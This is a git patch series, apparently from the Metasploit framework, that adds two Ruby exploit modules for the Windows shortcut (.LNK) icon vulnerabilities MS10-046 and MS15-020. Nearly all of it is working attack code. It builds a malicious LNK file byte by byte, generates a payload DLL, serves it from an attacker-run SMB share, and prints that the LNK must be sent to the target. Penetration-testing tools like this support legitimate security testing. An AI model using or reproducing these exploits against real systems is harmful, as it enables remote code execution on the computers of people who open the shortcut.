From a9fa2d25aa52434f2ac571d0ae9ef59d6b548abc Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 11 Mar 2015 23:23:56 -0500 Subject: [PATCH 1/2] Add SMB module for MS10-046 --- .../smb/ms10_046_shortcut_icon_dllloader.rb | 125 ++++++++++++++++++ 1 file changed, 125 insertions(+) create mode 100644 modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb diff --git a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb new file mode 100644 index 0000000000..8c5e68d44e --- /dev/null +++ b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb @@ -0,0 +1,125 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Remote::SMB::Server::Share + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows Shell LNK Code Execution', + 'Description' => %q{ + This module exploits a vulnerability in the handling of Windows + Shortcut files (.LNK) that contain an icon resource pointing to a + malicious DLL. This creates an SMB resource to provide the payload + inside a DLL, and generates a LNK file which must be sent to the + target. + }, + 'Author' => + [ + 'hdm', # Module itself + 'jduck', # WebDAV implementation, UNCHOST var + 'B_H' # Clean LNK template + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2010-2568'], + ['OSVDB', '66387'], + ['MSB', 'MS10-046'], + ['URL', 'http://www.microsoft.com/technet/security/advisory/2286198.mspx'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 2048, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', { } ] + ], + 'DisclosureDate' => 'Jul 16 2010', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk']) + ], self.class) + + register_advanced_options( + [ + OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', false]) + ], self.class) + + deregister_options('FILE_CONTENTS', 'FILE_NAME') + end + + def setup + super + + self.file_contents = generate_payload_dll + self.file_name = "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" + print_status("File available on #{unc}...") + end + + def primer + lnk = generate_link(unc) + file_create(lnk) + end + + def generate_link(unc) + uni_unc = unc.unpack('C*').pack('v*') + path = '' + path << [ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + path << uni_unc + + # LinkHeader + ret = [ + 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + + idlist_data = '' + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [path.length + 2].pack('v') + idlist_data << path + idlist_data << [0x00].pack('v') # TERMINAL WOO + + # LinkTargetIDList + ret << [idlist_data.length].pack('v') # IDListSize + ret << idlist_data + + # ExtraData blocks (none) + ret << [rand(4)].pack('V') + + # Patch in the LinkFlags + ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N') + ret + end +end From 68d69177ad4b8572ae60d48a5393fa0d170537d3 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 11 Mar 2015 23:46:50 -0500 Subject: [PATCH 2/2] Add smb module for MS15-020 --- .../smb/ms10_046_shortcut_icon_dllloader.rb | 1 + .../smb/ms15_020_shortcut_icon_dllloader.rb | 138 ++++++++++++++++++ 2 files changed, 139 insertions(+) create mode 100644 modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb diff --git a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb index 8c5e68d44e..bd5089e22a 100644 --- a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb @@ -76,6 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote def primer lnk = generate_link(unc) file_create(lnk) + print_status('The LNK file must be sent or shared with the target...') end def generate_link(unc) diff --git a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb new file mode 100644 index 0000000000..1bed288b79 --- /dev/null +++ b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb @@ -0,0 +1,138 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Remote::SMB::Server::Share + + attr_accessor :exploit_dll_name + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows Shell LNK Code Execution', + 'Description' => %q{ + This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling + of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious + DLL. This creates an SMB resource to provide the payload and the trigger, and generates a + LNK file which must be sent to the target. This module has been tested successfully on + Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027 + installed. + }, + 'Author' => + [ + 'Michael Heerklotz', # Vulnerability discovery + 'juan vazquez' # msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2015-0096'], + ['MSB', 'MS15-020'], + ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 2048, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', { } ] + ], + 'DisclosureDate' => 'Mar 10 2015', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk']) + ], self.class) + + register_advanced_options( + [ + OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', false]) + ], self.class) + + deregister_options('FILE_CONTENTS', 'FILE_NAME') + end + + def smb_host + "\\\\#{srvhost}\\#{share}\\" + end + + + def setup + super + + self.file_contents = generate_payload_dll + random_char = rand_text_alpha(1) + self.file_name = "#{random_char}.dll" + prefix = "#{random_char} " + random_length = 257 - smb_host.length - file_name.length - prefix.length + self.exploit_dll_name = "#{prefix}#{rand_text_alpha(random_length)}#{file_name}" + + print_status("Payload available on #{unc}...") + print_status("Trigger available on #{smb_host}#{exploit_dll_name}...") + end + + def primer + lnk = generate_link("#{smb_host}#{exploit_dll_name}") + file_create(lnk) + print_status('The LNK file must be sent or shared with the target...') + end + + def generate_link(unc) + uni_unc = unc.unpack('C*').pack('v*') + path = '' + path << [ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + path << uni_unc + + # LinkHeader + ret = [ + 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 + ].pack('C*') + + idlist_data = '' + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + idlist_data << [path.length + 2].pack('v') + idlist_data << path + idlist_data << [0x00].pack('v') # TERMINAL WOO + + # LinkTargetIDList + ret << [idlist_data.length].pack('v') # IDListSize + ret << idlist_data + + # ExtraData blocks (none) + ret << [rand(4)].pack('V') + + # Patch in the LinkFlags + ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N') + ret + end +end